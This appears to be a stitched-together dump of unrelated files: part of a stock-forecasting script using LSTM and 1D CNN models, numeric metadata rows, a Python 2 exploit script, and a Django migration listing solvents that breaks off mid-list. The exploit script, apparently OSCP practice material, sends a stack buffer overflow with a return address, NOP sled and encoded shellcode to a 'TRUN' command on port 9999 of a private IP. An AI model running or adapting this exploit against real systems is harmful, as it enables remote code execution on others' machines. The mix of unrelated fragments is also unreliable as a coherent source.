cfg_nn_models.Long_Short_Term_Memory,
ns_parser.n_inputs,
ns_parser.n_days,
)
model.compile(
optimizer=optimizers[cfg_nn_models.Optimizer](
learning_rate=ns_parser.lr
),
loss=cfg_nn_models.Loss,
)
model.fit(
X_train.reshape(X_train.shape[0], X_train.shape[1], 1),
y_train,
epochs=ns_parser.n_epochs,
verbose=True,
batch_size=ns_parser.n_batch_size,
validation_data=(
X_valid.reshape(X_valid.shape[0], X_valid.shape[1], 1),
y_valid,
),
callbacks=[es],
)
preds[i] = model.predict(
X_valid.reshape(X_valid.shape[0], X_valid.shape[1], 1)
).reshape(X_valid.shape[0], ns_parser.n_days)
forecast_data[i] = forecast(
forecast_data_input, future_dates, model, scaler
).values.flat
forecast_data_df = pd.DataFrame(forecast_data.T, index=future_dates)
if ns_parser.n_loops > 1:
forecast_data_df["Median"] = forecast_data_df.median(axis=1)
print_pretty_prediction(
forecast_data_df["Median"], df_stock["Adj Close"].values[-1]
)
else:
print_pretty_prediction(
forecast_data_df[0], df_stock["Adj Close"].values[-1]
)
plot_data_predictions(
df_stock,
np.median(preds, axis=0),
y_valid,
y_dates_valid,
scaler,
f"LSTM Model on {s_ticker}",
forecast_data_df,
ns_parser.n_loops,
)
print("")
except Exception as e:
print(e)
traceback.print_exc()
print("")
finally:
restore_env()
def conv1d(other_args: List[str], s_ticker: str, df_stock: pd.DataFrame):
"""
Train a 1D Convolutional Neural Net (1D CNN)
Parameters
----------
other_args:List[str]
Argparse arguments
s_ticker: str
Stock ticker
df_stock: pd.DataFrame
Dataframe of stock prices
"""
try:
ns_parser = parse_args(
prog="conv1d",
description="""1D CNN.""",
other_args=other_args,
)
if not ns_parser:
return
(
X_train,
X_valid,
y_train,
y_valid,
_,
_,
_,
y_dates_valid,
forecast_data_input,
dates_forecast_input,
scaler,
is_error,
) = prepare_scale_train_valid_test(df_stock["Adj Close"], ns_parser)
if is_error:
return
print(
f"Training on {X_train.shape[0]} sequences of length {X_train.shape[1]}. Using {X_valid.shape[0]} sequences "
f" of length {X_valid.shape[1]} for validation. Model will run {ns_parser.n_loops} loops"
)
future_dates = get_next_stock_market_days(
dates_forecast_input[-1], n_next_days=ns_parser.n_days
)
preds = np.zeros((ns_parser.n_loops, X_valid.shape[0], ns_parser.n_days))
forecast_data = np.zeros((ns_parser.n_loops, ns_parser.n_days))
for i in range(ns_parser.n_loops):
# Build Neural Network model
model = build_neural_network_model(
cfg_nn_models.Convolutional,
ns_parser.n_inputs,
ns_parser.n_days,
)
model.compile(
optimizer=optimizers[cfg_nn_models.Optimizer](
learning_rate=ns_parser.lr
),
loss=cfg_nn_models.Loss,
)
model.fit(
X_train.reshape(X_train.shape[0], X_train.shape[1], 1),
y_train,
epochs=ns_parser.n_epochs,
verbose=True,
batch_size=ns_parser.n_batch_size,
validation_data=(
X_valid.reshape(X_valid.shape[0], X_valid.shape[1], 1),
y_valid,
),
callbacks=[es],
)
preds[i] = model.predict(
X_valid.reshape(X_valid.shape[0], X_valid.shape[1], 1)
).reshape(X_valid.shape[0], ns_parser.n_days)
forecast_data[i] = forecast(
forecast_data_input, future_dates, model, scaler
).values.flat
forecast_data_df = pd.DataFrame(forecast_data.T, index=future_dates)
if ns_parser.n_loops > 1:
forecast_data_df["Median"] = forecast_data_df.median(axis=1)
print_pretty_prediction(
forecast_data_df["Median"], df_stock["Adj Close"].values[-1]
)
else:
print_pretty_prediction(
forecast_data_df[0], df_stock["Adj Close"].values[-1]
)
plot_data_predictions(
df_stock,
np.median(preds, axis=0),
y_valid,
y_dates_valid,
scaler,
f"Conv1D Model on {s_ticker}",
forecast_data_df,
ns_parser.n_loops,
)
print("")
except Exception as e:
print(e)
traceback.print_exc()
print("")
finally:
restore_env()
| 31.912671
| 122
| 0.548854
| 2,199
| 18,637
| 4.355161
| 0.099591
| 0.060144
| 0.052626
| 0.035084
| 0.811528
| 0.792315
| 0.745849
| 0.745849
| 0.745849
| 0.745849
| 0
| 0.010204
| 0.353222
| 18,637
| 583
| 123
| 31.96741
| 0.784304
| 0.100982
| 0
| 0.708972
| 0
| 0.017505
| 0.083273
| 0.001517
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010941
| false
| 0
| 0.02407
| 0
| 0.054705
| 0.065646
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4d80d3022b4905b879f9714b883258a4e58caa96
| 1,785
|
py
|
Python
|
OSCP/exploit.py
|
markhalasz/pyneta
|
444bfb94dba05c91a40821196d272609ea8ff875
|
[
"Apache-2.0"
] | null | null | null |
OSCP/exploit.py
|
markhalasz/pyneta
|
444bfb94dba05c91a40821196d272609ea8ff875
|
[
"Apache-2.0"
] | null | null | null |
OSCP/exploit.py
|
markhalasz/pyneta
|
444bfb94dba05c91a40821196d272609ea8ff875
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import socket
import sys
exploit = (
"\xd9\xe5\xd9\x74\x24\xf4\xba\x19\x3e\xf2\xb4\x58\x33\xc9\xb1"
"\x52\x31\x50\x17\x03\x50\x17\x83\xf1\xc2\x10\x41\xfd\xd3\x57"
"\xaa\xfd\x23\x38\x22\x18\x12\x78\x50\x69\x05\x48\x12\x3f\xaa"
"\x23\x76\xab\x39\x41\x5f\xdc\x8a\xec\xb9\xd3\x0b\x5c\xf9\x72"
"\x88\x9f\x2e\x54\xb1\x6f\x23\x95\xf6\x92\xce\xc7\xaf\xd9\x7d"
"\xf7\xc4\x94\xbd\x7c\x96\x39\xc6\x61\x6f\x3b\xe7\x34\xfb\x62"
"\x27\xb7\x28\x1f\x6e\xaf\x2d\x1a\x38\x44\x85\xd0\xbb\x8c\xd7"
"\x19\x17\xf1\xd7\xeb\x69\x36\xdf\x13\x1c\x4e\x23\xa9\x27\x95"
"\x59\x75\xad\x0d\xf9\xfe\x15\xe9\xfb\xd3\xc0\x7a\xf7\x98\x87"
"\x24\x14\x1e\x4b\x5f\x20\xab\x6a\x8f\xa0\xef\x48\x0b\xe8\xb4"
"\xf1\x0a\x54\x1a\x0d\x4c\x37\xc3\xab\x07\xda\x10\xc6\x4a\xb3"
"\xd5\xeb\x74\x43\x72\x7b\x07\x71\xdd\xd7\x8f\x39\x96\xf1\x48"
"\x3d\x8d\x46\xc6\xc0\x2e\xb7\xcf\x06\x7a\xe7\x67\xae\x03\x6c"
"\x77\x4f\xd6\x23\x27\xff\x89\x83\x97\xbf\x79\x6c\xfd\x4f\xa5"
"\x8c\xfe\x85\xce\x27\x05\x4e\x31\x1f\x0f\x37\xd9\x62\x0f\x56"
"\x46\xea\xe9\x32\x66\xba\xa2\xaa\x1f\xe7\x38\x4a\xdf\x3d\x45"
"\x4c\x6b\xb2\xba\x03\x9c\xbf\xa8\xf4\x6c\x8a\x92\x53\x72\x20"
"\xba\x38\xe1\xaf\x3a\x36\x1a\x78\x6d\x1f\xec\x71\xfb\x8d\x57"
"\x28\x19\x4c\x01\x13\x99\x8b\xf2\x9a\x20\x59\x4e\xb9\x32\xa7"
"\x4f\x85\x66\x77\x06\x53\xd0\x31\xf0\x15\x8a\xeb\xaf\xff\x5a"
"\x6d\x9c\x3f\x1c\x72\xc9\xc9\xc0\xc3\xa4\x8f\xff\xec\x20\x18"
"\x78\x11\xd1\xe7\x53\x91\xf1\x05\x71\xec\x99\x93\x10\x4d\xc4"
"\x23\xcf\x92\xf1\xa7\xe5\x6a\x06\xb7\x8c\x6f\x42\x7f\x7d\x02"
"\xdb\xea\x81\xb1\xdc\x3e")
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" *32 + exploit
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect = s.connect(('192.168.10.12', 9999))
    s.send(('TRUN /.:/' + shellcode))
except:
    print "check debugger"
s.close()
| 42.5
| 66
| 0.703641
| 398
| 1,785
| 3.150754
| 0.527638
| 0.009569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.273574
| 0.037535
| 1,785
| 41
| 67
| 43.536585
| 0.456345
| 0.011204
| 0
| 0
| 0
| 0.657143
| 0.827664
| 0.795918
| 0.028571
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.057143
| null | null | 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4d8289d06a57bc1f03711f994592163976287b2b
| 23,482
|
py
|
Python
|
rmgweb/database/migrations/0012_auto_20210902_1652.py
|
ReactionMechanismGenerator/RMG-website
|
7fe2ef9bdce6256cbc9f2453661cb482b2e97395
|
[
"MIT"
] | 10
|
2015-10-02T00:11:02.000Z
|
2021-04-04T05:57:10.000Z
|
rmgweb/database/migrations/0012_auto_20210902_1652.py
|
ReactionMechanismGenerator/RMG-website
|
7fe2ef9bdce6256cbc9f2453661cb482b2e97395
|
[
"MIT"
] | 128
|
2015-05-29T18:21:05.000Z
|
2022-03-01T21:06:01.000Z
|
rmgweb/database/migrations/0012_auto_20210902_1652.py
|
ReactionMechanismGenerator/RMG-website
|
7fe2ef9bdce6256cbc9f2453661cb482b2e97395
|
[
"MIT"
] | 23
|
2015-07-18T23:40:21.000Z
|
2021-04-24T02:58:46.000Z
|
# Generated by Django 2.2.5 on 2021-09-02 16:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('database', '0011_auto_20210706_1533'),
]
operations = [
migrations.CreateModel(
name='SoluteSearch',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('solute_smiles', models.TextField(null=True, verbose_name='Solute SMILES(s)')),
('solute_estimator', models.CharField(blank=True, choices=[('expt', 'Experimental (RMG-database)'), ('SoluteGC', 'Group Contribution Prediction (SoluteGC)'), ('SoluteML', 'Machine Learning Prediction (SoluteML)')], max_length=200, verbose_name='Solute Parameter Search Method')),
('solvent', models.CharField(blank=True, choices=[('water', '1. water'), ('1-octanol', '2. 1-octanol'), ('benzene', '3. benzene'), ('cyclohexane', '4. cyclohexane'), ('dibutylether', '5. dibutylether'), ('octane', '6. octane'), ('butanol', '7. butanol'), ('carbontet', '8. carbontet'), ('chloroform', '9. chloroform'), ('decane', '10. decane'), ('1,1-dichloroethane', '11. 1,1-dichloroethane'), ('dimethylformamide', '12. dimethylformamide'), ('dimethylsulfoxide', '13. dimethylsulfoxide'), ('dodecane', '14. dodecane'), ('ethanol', '15. ethanol'), ('heptane', '16. heptane'), ('hexadecane', '17. hexadecane'), ('hexane', '18. hexane'), ('isooctane', '19. isooctane'), ('nonane', '20. nonane'), ('pentane', '21. pentane'), ('toluene', '22. toluene'), ('undecane', '23. undecane'), ('acetonitrile', '24. acetonitrile'), ('ethylacetate', '25. ethylacetate'), ('methanol', '26. methanol'), ('methanol_50_water_50', '27. methanol_50_water_50'), ('acetonitrile_40_water_60', '28. acetonitrile_40_water_60'), ('acetonitrile_60_water_40', '29. acetonitrile_60_water_40'), ('2-methylpyridine', '30. 2-methylpyridine'), ('4-methylpentan-2-one', '31. 4-methylpentan-2-one'), ('acetic acid', '32. acetic acid'), ('1-phenylethanone', '33. 1-phenylethanone'), ('aniline', '34. aniline'), ('anisole', '35. anisole'), ('benzonitrile', '36. benzonitrile'), ('phenylmethanol', '37. phenylmethanol'), ('bromobenzene', '38. bromobenzene'), ('bromoethane', '39. bromoethane'), ('bromoform', '40. bromoform'), ('butan-2-one', '41. butan-2-one'), ('butyl acetate', '42. butyl acetate'), ('butylbenzene', '43. butylbenzene'), ('carbon disulfide', '44. carbon disulfide'), ('chlorobenzene', '45. chlorobenzene'), ('1-chlorohexane', '46. 1-chlorohexane'), ('cyclohexanone', '47. cyclohexanone'), ('decalin', '48. decalin'), ('decan-1-ol', '49. decan-1-ol'), ('1,1-dibromoethane', '50. 1,1-dibromoethane'), ('1,2-dichloroethane', '51. 1,2-dichloroethane'), ('ethoxyethane', '52. ethoxyethane'), ('2-propan-2-yloxypropane', '53. 2-propan-2-yloxypropane'), ('N,N-dimethylacetamide', '54. N,N-dimethylacetamide'), ('ethoxybenzene', '55. ethoxybenzene'), ('ethylbenzene', '56. ethylbenzene'), ('fluorobenzene', '57. fluorobenzene'), ('heptan-1-ol', '58. heptan-1-ol'), ('1-iodohexadecane', '59. 1-iodohexadecane'), ('hexan-1-ol', '60. hexan-1-ol'), ('iodobenzene', '61. iodobenzene'), ('2-methylpropan-1-ol', '62. 2-methylpropan-1-ol'), ('propan-2-ol', '63. propan-2-ol'), ('cumene', '64. cumene'), ('3-methylphenol', '65. 3-methylphenol'), ('2-methoxyethanol', '66. 2-methoxyethanol'), ('dichloromethane', '67. dichloromethane'), ('N-methylformamide', '68. N-methylformamide'), ('nitrobenzene', '69. nitrobenzene'), ('1-nitroethane', '70. 1-nitroethane'), ('nitromethane', '71. nitromethane'), ('nonan-1-ol', '72. nonan-1-ol'), ('1,2-dichlorobenzene', '73. 1,2-dichlorobenzene'), ('pentadecane', '74. pentadecane'), ('pentan-1-ol', '75. pentan-1-ol'), ('hexafluorobenzene', '76. hexafluorobenzene'), ('propan-1-ol', '77. propan-1-ol'), ('pyridine', '78. pyridine'), ('butan-2-ol', '79. butan-2-ol'), ('tert-butylbenzene', '80. tert-butylbenzene'), ('1,1,2,2-tetrachloroethene', '81. 1,1,2,2-tetrachloroethene'), ('oxolane', '82. oxolane'), ('1,2,3,4-tetrahydronaphthalene', '83. 1,2,3,4-tetrahydronaphthalene'), ('tributyl phosphate', '84. tributyl phosphate'), ('N,N-diethylethanamine', '85. N,N-diethylethanamine'), ('1,2,4-trimethylbenzene', '86. 1,2,4-trimethylbenzene'), ('1,4-xylene', '87. 1,4-xylene'), ('2-methylpropan-2-ol', '88. 
2-methylpropan-2-ol'), ('3-methylbutan-1-ol', '89. 3-methylbutan-1-ol'), ('undecan-1-ol', '90. undecan-1-ol'), ('propan-2-one', '91. propan-2-one'), ('methyl acetate', '92. methyl acetate'), ('propyl acetate', '93. propyl acetate'), ('pentyl acetate', '94. pentyl acetate'), ('2-methylbutan-2-ol', '95. 2-methylbutan-2-ol'), ('4-methylpentan-2-ol', '96. 4-methylpentan-2-ol'), ('2-methylpentan-1-ol', '97. 2-methylpentan-1-ol'), ('2-ethylhexan-1-ol', '98. 2-ethylhexan-1-ol'), ('2-methoxy-2-methylpropane', '99. 2-methoxy-2-methylpropane'), ('dodecan-1-ol', '100. dodecan-1-ol'), ('2-butoxyethanol', '101. 2-butoxyethanol'), ('2-ethoxyethanol', '102. 2-ethoxyethanol'), ('1-propoxypropane', '103. 1-propoxypropane'), ('pentan-2-ol', '104. pentan-2-ol'), ('2-methylbutan-1-ol', '105. 2-methylbutan-1-ol'), ('pentan-3-ol', '106. pentan-3-ol'), ('2-propoxyethanol', '107. 2-propoxyethanol'), ('2-propan-2-yloxyethanol', '108. 2-propan-2-yloxyethanol'), ('3-methoxybutan-1-ol', '109. 3-methoxybutan-1-ol'), ('1-tert-butoxy-2-propanol', '110. 1-tert-butoxy-2-propanol'), ('2-methoxy-2-methylbutane', '111. 2-methoxy-2-methylbutane'), ('pentan-2-one', '112. pentan-2-one'), ('ethyl butanoate', '113. ethyl butanoate'), ('heptan-2-one', '114. heptan-2-one'), ('hexyl acetate', '115. hexyl acetate'), ('1-nitro-2-octoxybenzene', '116. 1-nitro-2-octoxybenzene'), ('1-methylpyrrolidin-2-one', '117. 1-methylpyrrolidin-2-one'), ('N-methylacetamide', '118. N-methylacetamide'), ('morpholine-4-carbaldehyde', '119. morpholine-4-carbaldehyde'), ('N,N-dibutylformamide', '120. N,N-dibutylformamide'), ('formamide', '121. formamide'), ('N,N-diethylacetamide', '122. N,N-diethylacetamide'), ('1-methylpiperidin-2-one', '123. 1-methylpiperidin-2-one'), ('N-ethylformamide', '124. N-ethylformamide'), ('N-ethylacetamide', '125. N-ethylacetamide'), ('triolein', '126. triolein'), ('deca-1,9-diene', '127. deca-1,9-diene'), ('hexadec-1-ene', '128. hexadec-1-ene'), ('1,3-xylene', '129. 1,3-xylene'), ('1,2-xylene', '130. 1,2-xylene'), ('1,4-dioxane', '131. 1,4-dioxane'), ('1-chlorobutane', '132. 1-chlorobutane'), ('1,1,2,2-tetrabromoethane', '133. 1,1,2,2-tetrabromoethane'), ('1,1,2,2-tetrachloroethane', '134. 1,1,2,2-tetrachloroethane'), ('propane-1,2-diol', '135. propane-1,2-diol'), ('1,3-dimethylimidazolidin-2-one', '136. 1,3-dimethylimidazolidin-2-one'), ('propane-1,3-diol', '137. propane-1,3-diol'), ('butane-1,4-diol', '138. butane-1,4-diol'), ('pentane-1,5-diol', '139. pentane-1,5-diol'), ('1-bromonaphthalene', '140. 1-bromonaphthalene'), ('1-chloronaphthalene', '141. 1-chloronaphthalene'), ('dec-1-ene', '142. dec-1-ene'), ('hex-1-ene', '143. hex-1-ene'), ('1-nitropropane', '144. 1-nitropropane'), ('oct-1-ene', '145. oct-1-ene'), ('2-sulfanylethanol', '146. 2-sulfanylethanol'), ('3-methylthiolane 1,1-dioxide', '147. 3-methylthiolane 1,1-dioxide'), ('hexanedinitrile', '148. hexanedinitrile'), ('benzyl acetate', '149. benzyl acetate'), ('cyclohexylcyclohexane', '150. cyclohexylcyclohexane'), ('butanenitrile', '151. butanenitrile'), ('cis-1,2-dichloroethene', '152. cis-1,2-dichloroethene'), ('cis-decaline', '153. cis-decaline'), ('cyclohexanol', '154. cyclohexanol'), ('cyclohexylbenzene', '155. cyclohexylbenzene'), ('cyclopentanone', '156. cyclopentanone'), ('deuterated water', '157. deuterated water'), ('bis(2-ethylhexyl) hexanedioate', '158. bis(2-ethylhexyl) hexanedioate'), ('2,2-dichloroacetic acid', '159. 2,2-dichloroacetic acid'), ('diethyl benzene-1,2-dicarboxylate', '160. 
diethyl benzene-1,2-dicarboxylate'), ('2-(2-hydroxyethoxy)ethanol', '161. 2-(2-hydroxyethoxy)ethanol'), ('1-ethoxy-2-(2-ethoxyethoxy)ethane', '162. 1-ethoxy-2-(2-ethoxyethoxy)ethane'), ('1-methoxy-2-(2-methoxyethoxy)ethane', '163. 1-methoxy-2-(2-methoxyethoxy)ethane'), ('diiodomethane', '164. diiodomethane'), ('dibutyl benzene-1,2-dicarboxylate', '165. dibutyl benzene-1,2-dicarboxylate'), ('dinonyl benzene-1,2-dicarboxylate', '166. dinonyl benzene-1,2-dicarboxylate'), ('bis(2-ethylhexyl) phthalate', '167. bis(2-ethylhexyl) phthalate'), ('3-(3-hydroxypropoxy)propan-1-ol', '168. 3-(3-hydroxypropoxy)propan-1-ol'), ('ethane-1,2-diol', '169. ethane-1,2-diol'), ('furan-2-carbaldehyde', '170. furan-2-carbaldehyde'), ('furan-2-ylmethanol', '171. furan-2-ylmethanol'), ('oxolan-2-one', '172. oxolan-2-one'), ('1H-indene', '173. 1H-indene'), ('2-aminoethanol', '174. 2-aminoethanol'), ('1-ethylpyrrolidin-2-one', '175. 1-ethylpyrrolidin-2-one'), ('tetradecane', '176. tetradecane'), ('tridecane', '177. tridecane'), ('octamethylcyclotetrasiloxane', '178. octamethylcyclotetrasiloxane'), ('perflexane', '179. perflexane'), ('perfluorooctane', '180. perfluorooctane'), ('2-phenylacetonitrile', '181. 2-phenylacetonitrile'), ('propanenitrile', '182. propanenitrile'), ('4-methyl-1,3-dioxolan-2-one', '183. 4-methyl-1,3-dioxolan-2-one'), ('quinoline', '184. quinoline'), ('2-chlorobutane', '185. 2-chlorobutane'), ('squalane', '186. squalane'), ('tetraethylene glycol', '187. tetraethylene glycol'), ('tetraglyme', '188. tetraglyme'), ('thiodiglycol', '189. thiodiglycol'), ('trans-1,2-dichloroethene', '190. trans-1,2-dichloroethene'), ('trans-decalin', '191. trans-decalin'), ('N,N-dipentylpentan-1-amine', '192. N,N-dipentylpentan-1-amine'), ('tricaprylin', '193. tricaprylin'), ('triethyl phosphate', '194. triethyl phosphate'), ('triethylene glycol', '195. triethylene glycol'), ('triglyme', '196. triglyme'), ('N,N-dibutylbutan-1-amine', '197. N,N-dibutylbutan-1-amine'), ('N,N-dioctyloctan-1-amine', '198. N,N-dioctyloctan-1-amine'), ('hexamethylphosphoramide', '199. hexamethylphosphoramide'), ('dimethyl carbonate', '200. dimethyl carbonate'), ('diethyl carbonate', '201. diethyl carbonate')], max_length=200, verbose_name='Solvent (Optional)')),
('energy_unit', models.CharField(choices=[('kcal/mol', 'kcal/mol'), ('kJ/mol', 'kJ/mol')], default='kcal/mol', max_length=200, verbose_name='Preferred unit')),
],
),
migrations.CreateModel(
name='SolvationSearchML',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('solvent_solute_smiles', models.TextField(null=True, verbose_name='Solvent_Solute SMILES(s)')),
('calc_dGsolv', models.BooleanField(default=False, verbose_name='dGsolv')),
('calc_dHsolv', models.BooleanField(default=False, verbose_name='dHsolv')),
('calc_dSsolv', models.BooleanField(default=False, verbose_name='dSsolv')),
('calc_logK', models.BooleanField(default=False, verbose_name='logK')),
('calc_logP', models.BooleanField(default=False, verbose_name='logP')),
('option_selected', models.BooleanField(default=False, verbose_name='at least one option selected')),
('energy_unit', models.CharField(choices=[('kcal/mol', 'kcal/mol'), ('kJ/mol', 'kJ/mol')], default='kcal/mol', max_length=200, verbose_name='Preferred unit')),
],
),
migrations.CreateModel(
name='SolvationSearchTempDep',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('solvent_solute_temp', models.TextField(null=True, verbose_name='Solvent SMILES & Solute SMILES & Temperature')),
('calc_dGsolv', models.BooleanField(default=False, verbose_name='dGsolv')),
('calc_Kfactor', models.BooleanField(default=False, verbose_name='K-factor')),
('calc_henry', models.BooleanField(default=False, verbose_name="Henry's law constant")),
('calc_logK', models.BooleanField(default=False, verbose_name='logK')),
('calc_logP', models.BooleanField(default=False, verbose_name='logP')),
('option_selected', models.BooleanField(default=False, verbose_name='at least one option selected')),
('temp_unit', models.CharField(choices=[('K', 'K'), ('°C', '°C')], default='Kelvin', max_length=200, verbose_name='Input temperature unit')),
('energy_unit', models.CharField(choices=[('kcal/mol', 'kcal/mol'), ('kJ/mol', 'kJ/mol')], default='kcal/mol', max_length=200, verbose_name='Preferred unit')),
],
),
migrations.AlterField(
model_name='solventselection',
name='solvent',
field=models.CharField(blank=True, choices=[('water', '1. water'), ('1-octanol', '2. 1-octanol'), ('benzene', '3. benzene'), ('cyclohexane', '4. cyclohexane'), ('dibutylether', '5. dibutylether'), ('octane', '6. octane'), ('butanol', '7. butanol'), ('carbontet', '8. carbontet'), ('chloroform', '9. chloroform'), ('decane', '10. decane'), ('1,1-dichloroethane', '11. 1,1-dichloroethane'), ('dimethylformamide', '12. dimethylformamide'), ('dimethylsulfoxide', '13. dimethylsulfoxide'), ('dodecane', '14. dodecane'), ('ethanol', '15. ethanol'), ('heptane', '16. heptane'), ('hexadecane', '17. hexadecane'), ('hexane', '18. hexane'), ('isooctane', '19. isooctane'), ('nonane', '20. nonane'), ('pentane', '21. pentane'), ('toluene', '22. toluene'), ('undecane', '23. undecane'), ('acetonitrile', '24. acetonitrile'), ('ethylacetate', '25. ethylacetate'), ('methanol', '26. methanol'), ('methanol_50_water_50', '27. methanol_50_water_50'), ('acetonitrile_40_water_60', '28. acetonitrile_40_water_60'), ('acetonitrile_60_water_40', '29. acetonitrile_60_water_40'), ('2-methylpyridine', '30. 2-methylpyridine'), ('4-methylpentan-2-one', '31. 4-methylpentan-2-one'), ('acetic acid', '32. acetic acid'), ('1-phenylethanone', '33. 1-phenylethanone'), ('aniline', '34. aniline'), ('anisole', '35. anisole'), ('benzonitrile', '36. benzonitrile'), ('phenylmethanol', '37. phenylmethanol'), ('bromobenzene', '38. bromobenzene'), ('bromoethane', '39. bromoethane'), ('bromoform', '40. bromoform'), ('butan-2-one', '41. butan-2-one'), ('butyl acetate', '42. butyl acetate'), ('butylbenzene', '43. butylbenzene'), ('carbon disulfide', '44. carbon disulfide'), ('chlorobenzene', '45. chlorobenzene'), ('1-chlorohexane', '46. 1-chlorohexane'), ('cyclohexanone', '47. cyclohexanone'), ('decalin', '48. decalin'), ('decan-1-ol', '49. decan-1-ol'), ('1,1-dibromoethane', '50. 1,1-dibromoethane'), ('1,2-dichloroethane', '51. 1,2-dichloroethane'), ('ethoxyethane', '52. ethoxyethane'), ('2-propan-2-yloxypropane', '53. 2-propan-2-yloxypropane'), ('N,N-dimethylacetamide', '54. N,N-dimethylacetamide'), ('ethoxybenzene', '55. ethoxybenzene'), ('ethylbenzene', '56. ethylbenzene'), ('fluorobenzene', '57. fluorobenzene'), ('heptan-1-ol', '58. heptan-1-ol'), ('1-iodohexadecane', '59. 1-iodohexadecane'), ('hexan-1-ol', '60. hexan-1-ol'), ('iodobenzene', '61. iodobenzene'), ('2-methylpropan-1-ol', '62. 2-methylpropan-1-ol'), ('propan-2-ol', '63. propan-2-ol'), ('cumene', '64. cumene'), ('3-methylphenol', '65. 3-methylphenol'), ('2-methoxyethanol', '66. 2-methoxyethanol'), ('dichloromethane', '67. dichloromethane'), ('N-methylformamide', '68. N-methylformamide'), ('nitrobenzene', '69. nitrobenzene'), ('1-nitroethane', '70. 1-nitroethane'), ('nitromethane', '71. nitromethane'), ('nonan-1-ol', '72. nonan-1-ol'), ('1,2-dichlorobenzene', '73. 1,2-dichlorobenzene'), ('pentadecane', '74. pentadecane'), ('pentan-1-ol', '75. pentan-1-ol'), ('hexafluorobenzene', '76. hexafluorobenzene'), ('propan-1-ol', '77. propan-1-ol'), ('pyridine', '78. pyridine'), ('butan-2-ol', '79. butan-2-ol'), ('tert-butylbenzene', '80. tert-butylbenzene'), ('1,1,2,2-tetrachloroethene', '81. 1,1,2,2-tetrachloroethene'), ('oxolane', '82. oxolane'), ('1,2,3,4-tetrahydronaphthalene', '83. 1,2,3,4-tetrahydronaphthalene'), ('tributyl phosphate', '84. tributyl phosphate'), ('N,N-diethylethanamine', '85. N,N-diethylethanamine'), ('1,2,4-trimethylbenzene', '86. 1,2,4-trimethylbenzene'), ('1,4-xylene', '87. 1,4-xylene'), ('2-methylpropan-2-ol', '88. 2-methylpropan-2-ol'), ('3-methylbutan-1-ol', '89. 
3-methylbutan-1-ol'), ('undecan-1-ol', '90. undecan-1-ol'), ('propan-2-one', '91. propan-2-one'), ('methyl acetate', '92. methyl acetate'), ('propyl acetate', '93. propyl acetate'), ('pentyl acetate', '94. pentyl acetate'), ('2-methylbutan-2-ol', '95. 2-methylbutan-2-ol'), ('4-methylpentan-2-ol', '96. 4-methylpentan-2-ol'), ('2-methylpentan-1-ol', '97. 2-methylpentan-1-ol'), ('2-ethylhexan-1-ol', '98. 2-ethylhexan-1-ol'), ('2-methoxy-2-methylpropane', '99. 2-methoxy-2-methylpropane'), ('dodecan-1-ol', '100. dodecan-1-ol'), ('2-butoxyethanol', '101. 2-butoxyethanol'), ('2-ethoxyethanol', '102. 2-ethoxyethanol'), ('1-propoxypropane', '103. 1-propoxypropane'), ('pentan-2-ol', '104. pentan-2-ol'), ('2-methylbutan-1-ol', '105. 2-methylbutan-1-ol'), ('pentan-3-ol', '106. pentan-3-ol'), ('2-propoxyethanol', '107. 2-propoxyethanol'), ('2-propan-2-yloxyethanol', '108. 2-propan-2-yloxyethanol'), ('3-methoxybutan-1-ol', '109. 3-methoxybutan-1-ol'), ('1-tert-butoxy-2-propanol', '110. 1-tert-butoxy-2-propanol'), ('2-methoxy-2-methylbutane', '111. 2-methoxy-2-methylbutane'), ('pentan-2-one', '112. pentan-2-one'), ('ethyl butanoate', '113. ethyl butanoate'), ('heptan-2-one', '114. heptan-2-one'), ('hexyl acetate', '115. hexyl acetate'), ('1-nitro-2-octoxybenzene', '116. 1-nitro-2-octoxybenzene'), ('1-methylpyrrolidin-2-one', '117. 1-methylpyrrolidin-2-one'), ('N-methylacetamide', '118. N-methylacetamide'), ('morpholine-4-carbaldehyde', '119. morpholine-4-carbaldehyde'), ('N,N-dibutylformamide', '120. N,N-dibutylformamide'), ('formamide', '121. formamide'), ('N,N-diethylacetamide', '122. N,N-diethylacetamide'), ('1-methylpiperidin-2-one', '123. 1-methylpiperidin-2-one'), ('N-ethylformamide', '124. N-ethylformamide'), ('N-ethylacetamide', '125. N-ethylacetamide'), ('triolein', '126. triolein'), ('deca-1,9-diene', '127. deca-1,9-diene'), ('hexadec-1-ene', '128. hexadec-1-ene'), ('1,3-xylene', '129. 1,3-xylene'), ('1,2-xylene', '130. 1,2-xylene'), ('1,4-dioxane', '131. 1,4-dioxane'), ('1-chlorobutane', '132. 1-chlorobutane'), ('1,1,2,2-tetrabromoethane', '133. 1,1,2,2-tetrabromoethane'), ('1,1,2,2-tetrachloroethane', '134. 1,1,2,2-tetrachloroethane'), ('propane-1,2-diol', '135. propane-1,2-diol'), ('1,3-dimethylimidazolidin-2-one', '136. 1,3-dimethylimidazolidin-2-one'), ('propane-1,3-diol', '137. propane-1,3-diol'), ('butane-1,4-diol', '138. butane-1,4-diol'), ('pentane-1,5-diol', '139. pentane-1,5-diol'), ('1-bromonaphthalene', '140. 1-bromonaphthalene'), ('1-chloronaphthalene', '141. 1-chloronaphthalene'), ('dec-1-ene', '142. dec-1-ene'), ('hex-1-ene', '143. hex-1-ene'), ('1-nitropropane', '144. 1-nitropropane'), ('oct-1-ene', '145. 